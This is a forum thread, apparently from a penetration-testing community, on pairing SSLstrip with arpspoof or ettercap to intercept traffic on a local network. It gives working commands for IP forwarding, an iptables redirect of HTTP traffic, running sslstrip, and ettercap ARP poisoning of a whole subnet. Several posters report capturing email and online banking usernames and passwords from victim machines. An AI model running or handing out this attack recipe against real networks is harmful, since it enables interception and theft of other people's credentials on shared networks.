There are a couple of posts in here about using SSLstrip with arpspoof. This is working fine with my BT3 box but it has some drawbacks
1- Arpspoof works on one target at a time, so if you are on a busy DHCP network, you have to use something like "netdiscover" in the passive mode and manually arpspoof new targets on the run.
2-You can use:
# arpspoof -i eth0 -t 192.168.0.255 192.168.0.1
where you arp spoof the whole C class of your subnet but guess what? The gateway will display an IP conflict warining message.
3- Arpspoof is compiled with "eth0" as the device to use, even if you use "-i eth1" the attack will fail. You have to modify the arp.c file and compile arpspoof again to make it work on other NIC names or search for a compiled binary that has this issue resolved...
I would suggest following the following steps ( from the readme file included with the sslstrip package)
a)Flip your machine into forwarding mode (as root):
echo "1" > /proc/sys/net/ipv4/ip_forward
b) Setup iptables to intercept HTTP requests (as root):
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort>
c) Run sslstrip with the command-line options you'd like.
python sslstrip.py -k -p -l <yourListenPort>
And instead of using arpsoof use ettercap
d) Run ettercap to redirect traffic to your machine
ettercap -i eth1 -Tq -M ARP /192.168.0.1/ // // -P autoadd
We are telling ettercap to use "eth1", with terminal and quiet mode "-Tq" and use the arp poisoning attack "-M ARP". 192.168.0.1 is the gateway IP address and finally we are using the plugin autoadd to add new targets "-P autoadd".
Quoting from drakoth777
take a look at the network-devices.rules, each nic has it's own mac address that is tied to a certain interface name(eth0, eth1, etc) you can change all that in the network rules file.
If you get this working, you have to rename the eth0 to something else before renaming eth1 to eth0, on the practical level ettercap is the right tool. Or if arpspoof is easier for you, download the binary available in the forum. Search for "sslstrip & arpspoof"
Thanks for the reply.... I don't mind using ettercap .... anyway...... for others information, the following code required slight change for me:
So, capital K & P were replaced by lower case.... btw i'm using BT3Code:python sslstrip.py -k -p -l <yourListenPort>
Not a problem at all......
OK, now some feedback on the efficiency of the script. I used BT3 as attacker & Vista Home SP1 as victim. After poisoning, BT3 can successfully capture mail user ID & passwords (like gmail.com, mail.com, yahoo.com) and internet banking ID & password (like lloydsTSB, Barclays, HSBC). However, the victim can't logon to internet bank account, even the 2nd secuirity check page does not come up. So, it seems that our online banking is still safe...... any comments?
I think it has been patched in both firefox & ie. Anybody thinks different??
If you can't explain it simply, you don't understand it well enough -- Albert Einstein
Working for me:
Firefox 3.5, Windows XP SP3
~ Have you, g0tmi1k? ~
:rolleyes: <(^^,)> :p d[-_^]b (= =D-->--< :eek:
What do banks have running that other SSL sites don't?
after failing with arpspoof - when i have eth1 and it only works with eth0 (otherwise it gives "arpspoof couldn't arp for host" error).
i tried ettercap and it works like a champ.
my victim's machine is xp sp3 with ie8. shows gmail accounts, bank accounts etc.
thanks for posting